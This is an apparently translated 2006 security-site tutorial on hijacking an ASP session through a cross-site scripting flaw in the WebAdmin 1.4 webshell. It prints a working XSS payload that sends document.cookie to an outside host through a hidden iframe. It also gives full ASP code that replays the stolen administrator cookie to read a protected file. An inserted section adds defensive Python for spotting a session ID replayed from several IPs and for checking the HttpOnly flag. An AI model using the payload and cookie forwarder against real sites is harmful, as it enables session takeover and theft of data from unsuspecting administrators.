Cross-site scripting to achieve HTTP session hijacking - Vulnerability warning - Black Bar Safety Net (MYHACK58:62200610359)

2006-07-12 00:00:00
Anonymous (佚名)
www.myhack58.com

A web application has two ways to identify and keep track of different users: cookies, or sessions (also called session cookies). A cookie is stored on the client's computer and has a very long expiry time, so attacks on cookies generally steal the user's cookie and then forge it to impersonate the user. A session lives on the server side and expires as soon as the session is cancelled or times out, so it is often hard to exploit. Session authentication is therefore generally considered more secure than cookie authentication.

Of course, hard to exploit does not mean impossible to exploit. This article walks through a small example to carry out a simple HTTP session hijack.

Take ASP as the example again: how does an ASP program obtain the client's session? Capturing the traffic shows that the Cookie field of the HTTP request carries ASPSESSIONIDXXXXXXXX (the X's are random alphanumeric characters), and the ASP program identifies the session by this value. If we obtain the administrator's ASPSESSIONIDXXXXXXXX name and value and submit them to the server before that session ends, then our identity is the administrator!

So how do we get the session? The answer is cross-site scripting. JavaScript's document.cookie property reads out the cookies, which of course includes the session-type cookie.

If you follow web security, you will have seen cross-site scripts that record cookies. We need a similar program, but instead of recording, it must forward immediately, because the current session can be invalidated at any moment by the administrator logging out. This program could be written in ASP, PHP, Perl or even C; I still use ASP.

To write this program you also need to understand the target application quite well, because you have to submit the various requests yourself. So first let's look at the cross-site vulnerability used in this example.

I happened to check WebAdmin 1.4, and naturally, having written the program myself, I know best where the vulnerability is. Briefly: WebAdmin is a webshell for ASP.NET that uses session authentication, and version 1.4 has a cross-site scripting flaw in the directory-browse URL (Figure 1).

So I constructed a path like this in src: "E:<script>a='<iframe width=0 height=0 src=http://www.0x54.org/test/cc.asp?a=';a%2B=escape(document.cookie);a%2B='></iframe>';document.write(a);</script>". This code submits the current cookie as a parameter to the file www.0x54.org/test/cc.asp.

The cc.asp file reads as follows:

<%
' only for test with CSS (cross-site scripting)
str = Request("a")

' replay the forwarded Cookie header on a request to the target page
Set xPost = CreateObject("Msxml2.ServerXMLHTTP")
xPost.Open "GET", "http://222.210.115.125:813/webadmin.aspx?action=edit&src=E:\MyWeb\webadmin.aspx", False
xPost.setRequestHeader "Cookie", str
xPost.Send

' save the binary response body to a.txt next to this script
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3    ' adModeReadWrite
sGet.Type = 1    ' adTypeBinary
sGet.Open
sGet.Write xPost.responseBody
sGet.SaveToFile Server.MapPath("a.txt"), 2    ' adSaveCreateOverWrite

Set sGet = Nothing
Set xPost = Nothing
%>


The purpose of this file is to use the administrator's session to fetch, through WebAdmin's file-edit view, the content of the file E:\MyWeb\webadmin.aspx on the attacked web server (222.210.115.125, which is in fact my own machine here) and save it to the local a.txt file. The data is submitted with the ServerXMLHTTP component, which is similar to XMLHTTP but also differs from it in places; see "ServerXMLHTTP vs XMLHTTP" for the specifics.
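A defender-side counterpart to the mechanism just described, added here as an example and not code from the original post or from WebAdmin: it checks whether a Set-Cookie header still leaves the session cookie readable by document.cookie, and scans constructed, simplified W3C-style log lines for an ASPSESSIONID presented from more than one client address, which is the trace a forwarding script like cc.asp leaves. The log layout (single-token user agents), the sample addresses and the function names are assumptions.

```python
"""Defender-side checks for the session-hijacking pattern described above.
Added example, not code from the original post. Log lines and Set-Cookie
headers below are constructed samples."""
import re
from collections import defaultdict

SESSION_COOKIE = re.compile(r"(ASPSESSIONID[A-Z]+=[A-Z]+)")

# Constructed sample, assumed layout: date time client-ip user-agent cookie-header
# (user agents are single tokens here so the line splits on spaces).
SAMPLE_LOG = """\
2006-07-12 09:00:01 10.0.0.5 Mozilla/4.0 ASPSESSIONIDQABBCDEF=ABCDEFGHIJKLMNOPQRSTUVWX
2006-07-12 09:00:05 10.0.0.5 Mozilla/4.0 ASPSESSIONIDQABBCDEF=ABCDEFGHIJKLMNOPQRSTUVWX;theme=dark
2006-07-12 09:00:09 203.0.113.7 Msxml2 ASPSESSIONIDQABBCDEF=ABCDEFGHIJKLMNOPQRSTUVWX
2006-07-12 09:01:00 10.0.0.9 Mozilla/4.0 ASPSESSIONIDQABBCDEF=ZYXWVUTSRQPONMLKJIHGFEDC
"""


def sessions_seen_from_multiple_clients(log_text):
    """Return {session_cookie: sorted [(client_ip, user_agent), ...]} for every
    session cookie presented by more than one client address. A session read
    out of document.cookie and replayed from another host shows up here: the
    victim's browser and the replaying host share one session ID."""
    clients = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue  # header or truncated line
        _date, _time, ip, ua, cookies = parts
        m = SESSION_COOKIE.search(cookies)
        if m:
            clients[m.group(1)].add((ip, ua))
    return {sid: sorted(c) for sid, c in clients.items()
            if len({ip for ip, _ in c}) > 1}


def cookie_readable_by_script(set_cookie_header):
    """True if a Set-Cookie line lacks HttpOnly, i.e. document.cookie (the read
    used by the cross-site payload above) can still see the session cookie."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    for sid, who in sessions_seen_from_multiple_clients(SAMPLE_LOG).items():
        print("session presented from several clients:", sid, who)
    print(cookie_readable_by_script("ASPSESSIONIDQABBCDEF=ABC; path=/"))
    print(cookie_readable_by_script("ASPSESSIONIDQABBCDEF=ABC; path=/; HttpOnly"))
```

The second check is the mitigation side: an ASP.NET session cookie marked HttpOnly cannot be read by document.cookie, so the payload above has nothing to forward.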

Preparation done: first log in to WebAdmin, then visit the constructed cross-site URL, then look at http://www.0x54.org/test/a.txt; the content obtained is shown below:

You can also try accessing cc.asp directly; the a.txt it generates will then be the source of the login page.

Haha, now let's celebrate the successful conclusion of the HTTP session hijacking test. Carrying out such an attack end to end is still very hard, but then again, in this field, apart from copying other people's code, is there really nothing worth working hard on?